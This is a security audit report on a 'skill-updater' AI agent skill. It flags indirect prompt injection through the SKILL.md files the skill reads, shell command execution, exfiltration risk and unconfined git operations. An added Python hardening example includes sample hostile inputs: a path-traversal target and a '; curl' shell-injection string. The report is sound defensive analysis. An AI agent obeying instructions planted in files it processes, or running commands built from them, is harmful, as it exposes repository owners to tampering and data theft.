skill-updater

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH | COMMAND_EXECUTION | DATA_EXFILTRATION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill uses multiple subprocess calls to execute shell commands such as ls, grep, git, and make. Because the arguments to those commands are derived from the files the skill reads, this provides a direct path to arbitrary command execution if the skill is manipulated into running unauthorized commands.
  • DATA_EXFILTRATION (HIGH): The skill has broad read access to the file system (specifically the squads/ directory) and the ability to execute grep and git. This combination could be used to search for and stage sensitive information for exfiltration.
  • Indirect Prompt Injection (HIGH): As a 'Skill Updater', this tool reads external SKILL.md files and applies changes to them. Instructions placed in those files by a third party are indistinguishable from the data the skill is meant to edit, so the file content can steer what the skill does next.
  • Ingestion points: Reads squads/*/SKILL.md, squads/TEAM.md, and squads/_standards/*.
  • Boundary markers: None identified; it lacks delimiters to separate instructions from the data it processes.
  • Capability inventory: Uses ls, grep, git checkout, git add, git commit, and make validate-all via shell.
  • Sanitization: None identified; the skill directly processes and modifies files based on patterns it finds in existing content.
  • Privilege Escalation (MEDIUM): The skill performs file system modifications and git operations (git checkout -b, git add, git commit). These operations are intended to stay within the squads/ folder, but nothing confines them to it; a manipulated path could redirect a checkout, add, or commit to sensitive areas of the repository.
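The three gaps the findings above name (no boundary markers, shell commands built from file content, file operations not confined to squads/) map onto concrete checks. The following is an added example written for this audit page, not code from the audited skill; the "update:" line format of the sample SKILL.md, the marker strings, and the function names are illustrative assumptions.

```python
"""
Added example (not the audited skill's code): boundary markers around ingested
file content, an allow-list that confines paths to squads/, and argv-style
command construction instead of a shell string.
"""
import tempfile
from pathlib import Path

# Constructed sample SKILL.md (example data, not from the audited skill):
# one legitimate target inside squads/, one that escapes via "..", and one
# that carries shell metacharacters. The "update:" line format is assumed.
SAMPLE_SKILL_MD = """# Skill: example
update: squads/alpha/SKILL.md
update: squads/../.github/workflows/ci.yml
update: squads/alpha/SKILL.md; curl attacker.invalid
"""

BEGIN_MARK = "<<<BEGIN UNTRUSTED FILE {name}>>>"
END_MARK = "<<<END UNTRUSTED FILE {name}>>>"


def wrap_untrusted(name: str, text: str) -> str:
    """Boundary markers (the audit found none). Any prompt the agent builds
    from file content should carry the content inside these delimiters so
    the model can treat it as data rather than as instructions."""
    return f"{BEGIN_MARK.format(name=name)}\n{text}\n{END_MARK.format(name=name)}"


def parse_targets(skill_md: str) -> list[str]:
    """Pull the 'update:' paths out of the assumed sample format."""
    return [line.split(":", 1)[1].strip()
            for line in skill_md.splitlines() if line.startswith("update:")]


def confine(repo_root: Path, rel: str) -> Path:
    """Allow-list: the skill may only touch files under squads/. Resolve both
    sides first so '..' segments and symlinks cannot redirect a write."""
    allowed = (repo_root / "squads").resolve()
    candidate = (repo_root / rel).resolve()
    if not candidate.is_relative_to(allowed):
        raise PermissionError(f"{rel!r} resolves outside squads/: {candidate}")
    return candidate


def git_add_shell(path: str) -> str:
    """The risky pattern: one string handed to a shell. Metacharacters in the
    path become additional commands (returned here, never executed)."""
    return f"git add {path}"


def git_add_argv(path: Path) -> list[str]:
    """Hardened: an argv list for subprocess.run(..., shell=False). The path
    is exactly one argument, and '--' stops git from reading it as an option."""
    return ["git", "add", "--", str(path)]


def plan(repo_root: "str | Path", skill_md: str) -> tuple[list[list[str]], list[str]]:
    """Return (commands the skill would run, targets it rejected) for one SKILL.md."""
    root = Path(repo_root)
    accepted, rejected = [], []
    for rel in parse_targets(skill_md):
        try:
            accepted.append(git_add_argv(confine(root, rel)))
        except PermissionError:
            rejected.append(rel)
    return accepted, rejected


def demo() -> tuple[list[list[str]], list[str]]:
    """Run the checks against the constructed sample in a throwaway repo root."""
    repo_root = Path(tempfile.mkdtemp())
    print(wrap_untrusted("squads/alpha/SKILL.md", SAMPLE_SKILL_MD))
    commands, rejected = plan(repo_root, SAMPLE_SKILL_MD)
    for cmd in commands:
        print("would run:", cmd)
    for rel in rejected:
        print("rejected:", rel)
    print("shell string would have been:", git_add_shell(parse_targets(SAMPLE_SKILL_MD)[2]))
    return commands, rejected


if __name__ == "__main__":
    demo()
```

Note what the third sample line shows: the path with "; curl attacker.invalid" still resolves under squads/, so the allow-list alone does not stop it. It is neutralised only because the argv form passes it as a single filename (git reports no matching pathspec), whereas the shell-string form would run curl. Path confinement and shell avoidance are separate controls and the skill needs both.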
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 11:58 PM